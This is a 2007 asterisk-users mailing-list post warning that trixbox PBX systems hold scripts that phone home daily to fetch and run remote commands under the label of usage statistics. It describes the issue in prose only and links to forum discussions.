Than Taro
2007-Dec-16 04:42 UTC
[asterisk-users] Trixbox Arbitrary Command Execution Vulnerability
A set of scripts were recently discovered in the trixbox line of PBX products, which connect to a remote host every 24 hours, to retrieve an arbitrary list of commands to be executed locally. These scripts were added under the guise of submitting 'anonymous usage statistics', however, with the help of DNS pollution, or malice on the part of the sponsoring company (Fonality), all up-to-date versions of trixbox could be instantly disabled, or worse. According to trixbox Community Director, Kerry Gerrison, a new version of trixbox will be available by December 18th which will allow you to 'opt-out' (meaning that it will still be enabled by default) of this behavior. Further details: http://www.trixbox.org/forums/trixbox-forums/open-discussion/trixbox-phones-home http://www.trixbox.org/trixboxs-new-hardware-audting-tool _________________________________________________________________ Share life as it happens with the new Windows Live. http://www.windowslive.com/share.html?ocid=TXT_TAGHM_Wave2_sharelife_122007 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.digium.com/pipermail/asterisk-users/attachments/20071215/14083582/attachment.htm
Possibly Parallel Threads
Wisdom of the Ancients
